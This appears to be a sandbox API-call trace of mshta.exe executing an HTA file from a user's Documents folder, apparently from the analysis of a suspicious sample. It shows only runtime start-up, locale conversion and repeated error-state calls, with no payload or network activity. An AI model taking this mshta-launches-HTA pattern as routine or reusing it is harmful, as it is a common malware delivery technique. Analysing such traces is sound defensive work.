[0077.896] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.896] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.896] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.896] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.896] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.897] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.897] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.897] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.897] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.897] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.897] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.897] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.897] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.897] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.897] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.898] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.898] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.898] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.898] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.898] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x8, Size=0x214) returned 0x307d0
[0077.898] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.898] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.898] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.898] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.898] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.901] GetStartupInfoA (in: lpStartupInfo=0x39fc1c | out: lpStartupInfo=0x39fc1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0xa, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0077.901] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x8, Size=0x480) returned 0x309f0
[0077.901] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0077.901] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0077.901] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0077.901] SetHandleCount (uNumber=0x20) returned 0x20
[0077.901] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta\" "
[0077.901] GetEnvironmentStringsW () returned 0x120210*
[0077.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1413
[0077.901] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x585) returned 0x30e78
[0077.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x30e78, cbMultiByte=1413, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1413
[0077.901] FreeEnvironmentStringsW (penv=0x120210) returned 1
[0077.901] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] GetACP () returned 0x4e4
[0077.902] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x220) returned 0x31408
[0077.902] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x39fbf4 | out: lpCPInfo=0x39fbf4) returned 1
[0077.902] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x39f6c0 | out: lpCPInfo=0x39f6c0) returned 1
[0077.902] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x39f650 | out: lpCharType=0x39f650) returned 1
[0077.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0077.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x39f438, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0077.902] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x39f6d4 | out: lpCharType=0x39f6d4) returned 1
[0077.902] GetLastError () returned 0x0
[0077.902] SetLastError (dwErrCode=0x0)
[0077.902] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
[0077.902] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0077.903] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x39f3d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H呐\Û∁) returned 256
[0077.903] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H呐\Û∁, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0077.903] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H呐\Û∁, cchSrc=256, lpDestStr=0x39f1c8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256
[0077.903] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x39f9d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¤YÀÛ\x0cü9", lpUsedDefaultChar=0x0) returned 256
[0077.903] GetLastError () returned 0x0
[0077.903] SetLastError (dwErrCode=0x0)
[0077.903] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0077.903] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x39fad4, cbMultiByte=256, lpWideCharStr=0x39f3f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H吰\Û∁) returned 256
[0077.903] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H吰\Û∁, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0077.903] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ터㧰溂H吰\Û∁, cchSrc=256, lpDestStr=0x39f1e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256
[0077.903] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x39f8d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¤YÀÛ\x0cü9", lpUsedDefaultChar=0x0) returned 256
[0077.903] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x48b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0077.903] GetLastError () returned 0x0
[0077.903] SetLastError (dwErrCode=0x0)
[0077.903] GetLastError () returned 0x0
[0077.903] SetLastError (dwErrCode=0x0)
[0077.903] GetLastError () returned 0x0
[0077.903] SetLastError (dwErrCode=0x0)
[0077.903] GetLastError () returned 0x0
[0077.903] SetLastError (dwErrCode=0x0)
[0077.903] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.904] GetLastError () returned 0x0
[0077.904] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.905] SetLastError (dwErrCode=0x0)
[0077.905] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.906] GetLastError () returned 0x0
[0077.906] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.907] SetLastError (dwErrCode=0x0)
[0077.907] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.908] SetLastError (dwErrCode=0x0)
[0077.908] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.909] SetLastError (dwErrCode=0x0)
[0077.909] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] RtlAllocateHeap (HeapHandle=0x30000, Flags=0x0, Size=0x134) returned 0x31630
[0077.910] GetLastError () returned 0x0
[0077.910] SetLastError (dwErrCode=0x0)
[0077.910] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.911] SetLastError (dwErrCode=0x0)
[0077.911] GetLastError () returned 0x0
[0077.912] SetLastError (dwErrCode=0x0)
[0077.912] GetLastError () returned 0x0
